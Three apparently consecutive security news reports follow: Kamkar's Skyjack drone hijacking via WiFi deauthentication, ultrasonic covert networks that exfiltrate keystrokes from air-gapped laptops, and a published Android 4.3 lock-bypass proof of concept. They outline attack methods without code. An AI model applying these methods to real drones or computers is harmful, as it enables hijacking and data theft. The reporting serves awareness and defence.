Small drones can be quite inexpensive and easy to use. Some models can be controlled from an iPhone, tablet or Android device and can be modified fairly easily, as well. Kamkar, a veteran security researcher and hacker, has taken advantage of these properties and put together his own drone platform, called Skyjack. The drone has the ability to forcibly disconnect another drone from its controller and then force the target to accept commands from the Skyjack drone. All of this is done wirelessly and doesn’t require the use of any exploit or security vulnerability.
The drone platform that Kamkar built uses readily available components such as a Raspberry Pi and open-source software he developed. He said that, using the detailed instructions he’s published, anyone with a familiarity with Linux could build a Skyjack drone of his own in under an hour. With that and a controller, the builder is then ready to hijack his neighbor’s drone. The Parrot drones are available for less than $300 and the other components are relatively inexpensive, as well.
“My instructions are pretty detailed, I’ve made the code entirely free and open source, and fortunately all the technology is so low-cost and easy to acquire (< $400 for all of it, including your very own drone) that to put it all together from my instructions would take someone under an hour if they were familiar with Linux,” Kamkar said via email.
“I may also release an ISO that users can simply drop onto a Raspberry Pi without performing any configuration at all, and in that case it would potentially just take minutes without any setup required besides plugging components in!”
The method that Kamkar’s code uses to take over a target drone is deceptively simple. The Skyjack drone detects the wireless signal sent out by a target drone, injects WiFi packets into the target’s connection, de-authenticates it from its real controller and then authenticates it to the Skyjack drone. Kamkar then has the ability to send any commands he wants to the hijacked drone. This can all be done from the ground, as well, he said, using a normal Linux box and his code.
Kamkar uses Aircrack-ng, a wireless key cracking application, to find target drones and then the Skyjack software deactivates the clients and then connects to them. He finds the drones by looking for MAC addresses owned by Parrot, the company that makes the small drones he used for his project. The target range of the Skyjack drones is limited by the range of the WiFi card, but Kamkar said he uses a very powerful WiFi adapter called the Alfa AWUS036H, which produces 1000mW of power.
“The only security on the Parrot drones is that when the owner is connected to it, no one else is able to control it. This is why I need to use a wifi chipset that allows me to inject packets as I need to exploit wifi and deauthenticate the true owner who is controlling it,” Kamkar said.
“Once deauth’d, I can then take over control without ever actually exploiting the Parrot itself since it creates its own open, wireless network.”
Amazon’s Jeff Bezos said the company’s Prime Air drone delivery program is several years away yet, and it’s unclear which drone platform it will use if it’s ever deployed. Kamkar’s Skyjack code is available free on Github.
This story was updated on Dec. 4 to clarify that not all drones use WiFi and that Skyjack isn’t meant to work against all drone platforms.
Image from Flickr photos of Unten44.
The soundest security advice managers of critical computing systems have been given is to air gap those machines. Don’t network them and don’t expose them to the Internet, and there’s no way hackers reach them from the Web and no way a direct infection replicates.
Recently, there’s been reason for pause in that thinking, starting with the speculation and skepticism over badBIOS, malware that allegedly can not only cross platforms, but can infect air-gapped machines using sound waves.
Now comes another attack using high-frequency sound waves to infect machines, bypassing the good old-fashioned ways of phishing emails and infected USB drives. Researchers at the Fraunhofer Institute for Communication, Information Processing and Ergonomics in Germany had a paper published last week in the scientific journal, Journal of Communications of San Jose, in which they describe how to use a communication system designed for underwater use to deliver or intercept short bits of code, such as passwords, over hops of air-gapped computers. The computers act as a mesh network where each node can send or receive code—in this case an audio emanation—and acts as a router sending data to the next hop in the chain before it’s received by the attacker.
Michael Hanspach, one of the researchers, along with colleague Michael Goetz, told Threatpost that there is no connection between their paper “On Covert Acoustical Mesh Networks in Air” and badBIOS. Hanspach said their attack is practical today because the utilized techniques are well documented.
“If we were able to come up with this research with very few people, time and budget (and with good intentions), so would be larger groups (maybe with a different intention),” Hanspach said via email. “Therefore, anyone working in a security critical context should be thinking about protection measures.”
The two scientists were able to use this underwater communication system based on the Generic Underwater Application Language (GUWAL), used for communication on networks with low bandwidth to exchange data between unconnected systems using only the built-in microphones and speakers that accompany today’s computers. They used a Lenovo T400 laptop running the Debian operating system. Devices such as microphones and speakers are not generally considered when network and security policies are developed, the scientists said, making them the perfect pawns for this kind of covert communication.
“The concept of a covert acoustical mesh network renders many conventional security concepts useless, as acoustical communications are usually not considered,” the scientists wrote in their paper.
The scientists were able to use ultrasonic frequencies, inaudible to humans, to transmit data almost 65 feet between laptops at a slow 20 bits per second rate with latency of 6 seconds per hop. Adding additional hops overcomes the distance problem, but for this particular scenario, limits the sophistication of the code sent.
“Of course, you could only transfer small-sized information over this network,” Hanspach told Threatpost. “But, the limit of 20 bit/s is just what we could reasonably achieve in the presented setup and is not necessarily a general limit.”
The research paper presents several scenarios in which such an attack would work. Starting with a computer compromised with a keylogger called logkeys, for example, keystrokes are written to a named pipe read out by the acoustic transmitter, the paper said, which sends the data to through the covert network until it reaches the attacker. Hanspach said the keylogger has been successfully tested in this setup.
Hanspach and Goetz also said that this type of covert network could be used to break two-factor authentication by listening for and transmitting the authentication feedback of a hardware dongle or smartcard. They also speculate it could be used to send data such as private encryption keys or text files of stolen data.
As for countermeasures, it may not always be possible to turn off audio devices because they would be needed for VoIP or video conferencing, so the scientists recommend the use of audio-filtering guards or a host-based audio intrusion detection guard, both of which analyze audio input and output looking for anomalous signals or hidden messages.
While the possibilities presented in this paper and by badBIOS might seem outlandish, they are new areas of research that defenders have not considered in policies or preventative technology.
“We have shown that the establishment of covert acoustical mesh networks in air is feasible in setups with commonly available business laptops,” the paper said. “Acoustical networking as a covert communication technology is a considerable threat to computer security and might even break the security goals of high assurance computing systems based on formally verified micro kernels that did not consider acoustical networking in their security concept.”
The researchers who discovered a serious vulnerability in Android 4.3 Jelly Bean that enables a malicious app to disable the security locks on a vulnerable device have published a proof-of-concept app that exploits the bug, as well as source code for the app.
The vulnerability in question lies in the way that Jelly Bean handles the flow of requests when a user attempts to change one of the many security locks in the operating system. If a user goes in to change, for example, the gesture lock, Android will ask the user to confirm her PIN code or another security mechanism. The vulnerability enables a malicious app to disable this check and all of the security locks in the OS. Researchers at Curesec in Germany discovered the bug in October and reported it to Google, which included a fix in Android 4.4 Kit Kat.
However, Android 4.3 Jelly Bean is by far the most widely deployed version of the mobile OS and it has become obvious in the last couple of years that few carriers bother to push security updates to their users, preferring to have them buy new handsets with newer software instead. This means that there are millions of Android devices potentially vulnerable to this attack. The researchers at Curesec on Tuesday published an app that demonstrates the attack and also released the source code for the app, giving other researchers the ability to reproduce the exploit.
Marco Lux, a researcher at Curesec, said that he doesn’t know of any workarounds for the vulnerability, and there’s no patch available for Jelly Bean at this point.
“I am not aware of any workaround. By my current knowledge it can be only done by a malicious app,” Lux said via email.
Unlike Apple, which pushes updates directly to users via the software update mechanism in iOS, Android updates are the responsibility of the various carriers who sell Android devices. The ACLU has asked the Federal Trade Commission to investigate the carriers’ failure to send security updates to users and security and privacy researchers have been critical of the carriers for this oversight, as well.
In order to exploit the vulnerability discovered by Curesec, an attacker would need to entice a target user to download a malicious app to her device, something that has proven to be rather easy to do in recent years. Malicious apps, as well as legitimate ones laden with hidden malware, have shown up regularly in Google Play and third-party app stores.
Image from Flickr photos of Milind Alvares.